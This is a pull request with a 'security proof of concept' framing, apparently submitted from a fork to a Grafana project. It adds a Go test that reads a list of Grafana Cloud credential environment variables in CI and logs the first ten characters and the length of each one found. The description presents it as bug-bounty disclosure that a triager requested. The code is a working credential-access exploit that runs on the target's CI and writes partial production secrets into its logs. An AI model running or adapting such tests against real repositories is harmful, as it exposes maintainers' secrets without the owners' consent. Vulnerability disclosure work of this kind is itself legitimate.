### PR TITLE
[SECURITY POC] Demonstrating credential access from fork PR

### DIFF
--- a/internal/resources/cloud/poc_test.go
+++ b/internal/resources/cloud/poc_test.go
@@ -1,0 +1,52 @@
+package cloud_test
+
+import (
+    "testing"
+    "os"
+    "fmt"
+)
+
+func TestPoCCredentialAccess(t *testing.T) {
+    t.Log("=== SECURITY PoC: Demonstrating credential access from fork PR ===")
+    t.Log("=== Authorized by Intigriti triager @frostweaver ===")
+    
+    credentials := []string{
+        "GRAFANA_AUTH",
+        "GRAFANA_URL",
+        "GRAFANA_ONCALL_ACCESS_TOKEN",
+        "GRAFANA_SM_ACCESS_TOKEN",
+        "GRAFANA_SM_URL",
+        "GRAFANA_K6_ACCESS_TOKEN",
+        "GRAFANA_CLOUD_PROVIDER_ACCESS_TOKEN",
+        "GRAFANA_CLOUD_PROVIDER_AWS_ROLE_ARN",
+        "GRAFANA_FLEET_MANAGEMENT_AUTH",
+        "GRAFANA_FLEET_MANAGEMENT_URL",
+        "GRAFANA_STACK_ID",
+        "GRAFANA_CLOUD_PROVIDER_URL",
+    }
+    
+    foundCount := 0
+    for _, cred := range credentials {
+        val := os.Getenv(cred)
+        if val != "" {
+            foundCount++
+            // Show only first 10 chars to prove access without leaking full token
+            preview := val
+            if len(val) > 10 {
+                preview = val[:10] + "..." + fmt.Sprintf("[%d chars total]", len(val))
+            }
+            t.Logf("✓ ACCESSIBLE: %s = %s", cred, preview)
+        } else {
+            t.Logf("✗ NOT SET: %s", cred)
+        }
+    }
+    
+    t.Logf("\n=== SUMMARY ===")
+    t.Logf("Total credentials accessible from fork PR: %d", foundCount)
+    
+    if foundCount == 0 {
+        t.Fatal("PoC failed: No credentials accessible (fork protection may be working)")
+    } else {
+        t.Logf("✓ PoC SUCCESSFUL: Fork PR can access production credentials")
+    }
+}


### PR DESCRIPTION
## ⚠️ Security Researcher Disclosure ⚠️

This PR is a **Proof of Concept** for Intigriti submission demonstrating that fork PRs can access production Grafana Cloud credentials.

### Authorization
- **Requested by:** Intigriti triager @frostweaver
- **Purpose:** Demonstrate exploitability as requested in triage response

### What This PoC Does
- Adds a test file that logs **first 10 characters only** of accessible credentials
- Does NOT exfiltrate credentials outside GitHub CI
- Does NOT attempt to use credentials to access Grafana services
- Simply proves that fork PRs CAN see production secrets

### Test File Added
`internal/resources/cloud/poc_test.go` - Test that enumerates accessible environment variables

### Expected Result
The `cloudinstance` job in CI will show:
- Which credentials are accessible to fork PR tests
- Character count proving these are real tokens
- No fork protection blocking access

### Clean-up
**This PR will be closed immediately** after capturing CI logs as proof. No credentials will be exposed publicly.

---

**Note to Grafana Team:** This is responsible disclosure. The vulnerability allows ANY GitHub user to exfiltrate these credentials. I am only demonstrating access, not exploiting it.